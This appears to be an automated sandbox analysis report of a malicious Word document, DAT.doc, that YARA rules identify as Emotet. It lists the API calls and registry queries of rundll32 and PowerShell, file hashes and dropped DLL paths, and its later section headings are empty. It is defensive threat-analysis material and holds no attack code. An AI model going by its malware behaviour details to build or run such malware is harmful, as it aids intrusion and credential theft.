Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_1000DADD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	7_2_1000DB1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_10017B1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,	7_2_1000A33F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	7_2_10017B5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	7_2_10017BD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	7_2_10016429
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	7_2_10017C5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	7_2_1000DD4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	7_2_10017E4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_10017F79

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10010D9C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_10010D9C

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 0000000F.00000002.2153905031.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155916188.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150770541.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147679834.0000000000311000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162568948.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141920127.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2159102288.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2358984806.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155772363.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157336614.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143541090.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147601789.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150877098.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141994054.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162462473.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2149091905.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146032293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146169134.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2153961508.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152298877.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2158760347.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

ID:	344355
Product:	CloudBasic
Start time:	13:47:24
Start date:	26.01.2021
Sample:	DAT.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	6792d7fd9d2f9237cd31d1234edcec03
SHA1:	af8329cc3d379f678aac5f2a1b83a7697dd190af
SHA256:	55f177ec4613b1b03a37199e3c7d49336dd424a66737f79005208aa9883b192b
Filetype:	Microsoft Word document (32009/1) 54.23%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD45F3-025D-4403-9DBE-B492A11253DC}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EFB91ABE-05DA-472A-B36E-E117862B01B3}.tmp	data	046714685D54E39663BFFF13AABE42AF	22BFFE5DBD5460D954ED62EADF55B86F6F15CD1B	98A19DFE5BF35608A2629B9BA7E6AC3E8B27C4C34B4FEB9F8916FDACB84B4F6E
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd	data	398F7CDDC8E08A25BBE33EAE236619CD	C87ECEC396D70A05EA7C45A203994874BFA7BB73	4894BA0CE30D95F643D5094498300D002A1DAE075545982F76BF8FCA5C591DB2
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DAT.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Tue Jan 26 20:47:41 2021, length=217600, window=hide	73F1F369EF0B792BFEC29ABE55E63B52	744555DA903DC01290713CBD52A467A5AAC10771	26E8BAD56AEF128550BDECAE7668FC826AF0DF07CC9979AE15F935AB08CD184D
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	26269B76605D99EE3B367DCC3644AA0C	A15EA89E09646F9044B44F6B3CAA1789C2D15ADF	6511114584177216108550D28F472A9A67A6199EB28DA182995787A3E41420F0
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	4A5DFFE330E8BBBF59615CB0C71B87BE	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LUH2B8VGADR0W1ZLPOHV.temp	data	87912A51973EC64DDA95BF055807AAE5	8C4E99EFE1E17123DBE25D05F8C20D4D57FEB00D	49DBD1B13A2E3552CA326D5CFE2C7E700D98BFD6A8827D08ED2A5BBF6875BFEC
C:\Users\user\Desktop\~$DAT.doc	data	4A5DFFE330E8BBBF59615CB0C71B87BE	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	3B0A191F70968B2B033B99A8668E7445	E51E0DBA230E63ED4DD53C9FCB66A84ACD3F32A2	D9942043944E5D28D9EAED4988C45020187B4A88F10B67B7C32F27592B8929B1

Analysis Report DAT.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs